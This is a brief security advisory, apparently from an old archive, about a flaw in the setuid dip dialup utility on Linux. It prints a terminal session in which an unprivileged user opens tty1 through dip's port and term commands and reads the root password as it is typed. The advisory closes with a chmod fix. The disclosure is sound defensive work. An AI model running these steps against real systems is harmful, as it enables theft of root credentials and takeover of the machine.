COMMAND

    /usr/sbin/dip

SYSTEMS AFFECTED

    Linux

PROBLEM

    George  Staikos  found  yet  another  DIP  exploit.  It appears to
    allow any user to gain control of arbitrary devices in /dev.   For
    instance, George have successfully  stolen keystrokes from a  root
    login as follows...   (he could also  dump characters to  the root
    console)

	$ whoami
	cesaro
	$ cat < /dev/tty1                    <------ root login here
	bash: /dev/tty1: Permission denied   <------ nope, we can see it

	$ dip -t
	DIP: Dialup IP Protocol Driver version 3.3.7o-uri (8 Feb 96)
	Written by Fred N. van Kempen, MicroWalt Corporation.

	DIP> port tty1
	DIP> echo on
	DIP> term
	[ Entering TERMINAL mode.  Use CTRL-] to get back ]
	roots_password                       <------ OH, maybe we *CAN* see it!
	[ Back to LOCAL mode. ]
	DIP> quit
	$

    There are many more creative things to do with this.

SOLUTION

    It is recommended as usual in this cases:

	chmod u-s /usr/sbin/dip